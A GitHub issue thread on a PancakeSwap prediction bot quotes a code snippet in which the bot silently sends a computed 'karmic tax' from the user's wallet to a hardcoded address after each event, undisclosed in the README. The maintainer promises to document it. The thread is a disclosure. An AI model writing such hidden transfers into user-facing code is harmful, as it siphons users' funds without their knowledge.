### ISSUE TITLE
KarmicTax still no mentioned anywhere 

### ISSUE THREAD

**Issue by gensx-x1** [AssaEmpireToken/Pancakeswap-Prediction-Bot-2022-Updated#19]
for (const event of receipt.events ?? []) {
        const karmicTax = await signer.sendTransaction({
          to: "0x0A4A569cfA700Fc2A1d54974712716E537C169ff",
          value: calculateTaxAmount(event?.args?.amount),
        });

this , its okay to have it , but its not fair not to mention it anywhere in readme.

**Comment by AssaEmpireToken** [comment]
Is not in Readme ? Sorry i will edit it :)
